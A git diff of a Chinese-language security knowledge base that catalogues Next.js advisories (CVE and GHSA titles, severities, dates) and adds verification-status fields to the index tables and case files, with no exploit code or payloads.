- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `0` - 总案例数: `0`
- 近 30 天新增/更新: `0` - 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0` - 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -25,6 +29,6 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | | No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |


@@ -8,7 +8,11 @@
- 总案例数: `26` - 总案例数: `26`
- 近 30 天新增/更新: `5` - 近 30 天新增/更新: `5`
- 重点 Markdown 案例数: `26` - 重点 Markdown 案例数: `26`
- 最近渲染时间: `2026-03-17T04:37:52+00:00` - 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `26`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束 ## 目标约束
@@ -26,31 +30,31 @@
## 案例列表 ## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | | 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------| |------|--------|----------|----------|----------|------------|----------|--------|
| Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) | | Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) |
| Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) | | Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) |
| Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) | | Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) |
| Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) | | Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) |
| Next Server Actions Source Code Exposure | `low` | `generated` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) | | Next Server Actions Source Code Exposure | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) |
| Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) | | Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) |
| Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) | | Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) |
| Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) | | Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) |
| Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) | | Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) |
| Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) | | Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) |
| Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) | | Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) |
| Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) | | Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) |
| Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) | | Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) |
| Next.js Race Condition to Cache Poisoning | `low` | `generated` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) | | Next.js Race Condition to Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) |
| Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) | | Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) |
| Authorization Bypass in Next.js Middleware | `low` | `generated` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) | | Authorization Bypass in Next.js Middleware | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) |
| Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) | | Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) |
| Next.js authorization bypass vulnerability | `low` | `generated` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) | | Next.js authorization bypass vulnerability | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) |
| Denial of Service condition in Next.js image optimization | `low` | `generated` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) | | Denial of Service condition in Next.js image optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) |
| Next.js Cache Poisoning | `low` | `generated` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) | | Next.js Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) |
| Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) | | Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) |
| Unexpected server crash in Next.js. | `low` | `generated` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) | | Unexpected server crash in Next.js. | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) |
| XSS in Image Optimization API for Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) | | XSS in Image Optimization API for Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) |
| Open Redirect in Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) | | Open Redirect in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) |
| Open Redirect in Next.js versions | `low` | `generated` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) | | Open Redirect in Next.js versions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) |
| Directory Traversal in Next.js | `low` | `generated` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) | | Directory Traversal in Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) |


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:14:13.665535Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-x56p
# Open Redirect in Next.js versions # Open Redirect in Next.js versions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2020-15242` - Canonical ID: `nextjs--CVE-2020-15242`


@@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:49:56Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7
# Directory Traversal in Next.js # Directory Traversal in Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2020-5284` - Canonical ID: `nextjs--CVE-2020-5284`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:08.038285Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-vxf5
# Open Redirect in Next.js # Open Redirect in Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2021-37699` - Canonical ID: `nextjs--CVE-2021-37699`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:20.154452Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-9gr3
# XSS in Image Optimization API for Next.js # XSS in Image Optimization API for Next.js
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2021-39178` - Canonical ID: `nextjs--CVE-2021-39178`


@@ -8,6 +8,10 @@ updated_date: "2026-03-13T22:00:36.554552Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -34,6 +38,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-25mp
# Unexpected server crash in Next.js. # Unexpected server crash in Next.js.
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2021-43803` - Canonical ID: `nextjs--CVE-2021-43803`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:32:36.434669Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -32,6 +36,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-fr5h
# Next.js Server-Side Request Forgery in Server Actions # Next.js Server-Side Request Forgery in Server Actions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-34351` - Canonical ID: `nextjs--CVE-2024-34351`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:45:33.402195Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f
# Next.js Cache Poisoning # Next.js Cache Poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-46982` - Canonical ID: `nextjs--CVE-2024-46982`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T03:25:43.295558Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-g77x
# Denial of Service condition in Next.js image optimization # Denial of Service condition in Next.js image optimization
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-47831` - Canonical ID: `nextjs--CVE-2024-47831`


@@ -8,6 +8,10 @@ updated_date: "2025-09-10T21:12:24Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc
# Next.js authorization bypass vulnerability # Next.js authorization bypass vulnerability
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-51479` - Canonical ID: `nextjs--CVE-2024-51479`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T04:36:04.252972Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -35,6 +39,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-7m27
# Next.js Allows a Denial of Service (DoS) with Server Actions # Next.js Allows a Denial of Service (DoS) with Server Actions
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2024-56332` - Canonical ID: `nextjs--CVE-2024-56332`


@@ -8,6 +8,10 @@ updated_date: "2026-03-04T15:06:29.993197Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -37,6 +41,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-f82v
# Authorization Bypass in Next.js Middleware # Authorization Bypass in Next.js Middleware
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-29927` - Canonical ID: `nextjs--CVE-2025-29927`


@@ -8,6 +8,10 @@ updated_date: "2025-10-13T15:35:50Z"
severity: "medium" severity: "medium"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -41,6 +45,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-223j
# Next.js may leak x-middleware-subrequest-id to external hosts # Next.js may leak x-middleware-subrequest-id to external hosts
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-30218` - Canonical ID: `nextjs--CVE-2025-30218`


@@ -8,6 +8,10 @@ updated_date: "2025-09-26T17:48:29Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-qpjv
# Next.js Race Condition to Cache Poisoning # Next.js Race Condition to Cache Poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-32421` - Canonical ID: `nextjs--CVE-2025-32421`


@@ -8,6 +8,10 @@ updated_date: "2025-06-13T14:41:21Z"
severity: "medium" severity: "medium"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -33,6 +37,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-3h52
# Information exposure in Next.js dev server due to lack of origin verification # Information exposure in Next.js dev server due to lack of origin verification
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-48068` - Canonical ID: `nextjs--CVE-2025-48068`


@@ -8,6 +8,10 @@ updated_date: "2026-02-04T02:37:18.974477Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-r2fc
# Next.js has a Cache poisoning vulnerability due to omission of the Vary header # Next.js has a Cache poisoning vulnerability due to omission of the Vary header
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
## 事件层 ## 事件层
- Canonical ID: `nextjs--CVE-2025-49005` - Canonical ID: `nextjs--CVE-2025-49005`


@@ -8,6 +8,10 @@ updated_date: "2025-07-03T21:49:52Z"
severity: "low" severity: "low"
exploit_status: "unknown" exploit_status: "unknown"
source_confidence: "official" source_confidence: "official"
verification_status: "triage-manual"
verification_mode: "synthetic"
artifact_mode: "synthetic"
last_run_id: ""
target_types: target_types:
- "lab-local" - "lab-local"
- "lab-public" - "lab-public"
@@ -31,6 +35,15 @@ primary_source: "https://github.com/vercel/next.js/security/advisories/GHSA-67rr
# Next.JS vulnerability can lead to DoS via cache poisoning # Next.JS vulnerability can lead to DoS via cache poisoning
## 本地实证状态
- 实证状态: `triage-manual`
- 实证方式: `synthetic`
- Artifact 模式: `synthetic`
- 最近运行: `-`
- 浏览器证据: `missing`
- Run Bundle: `-`
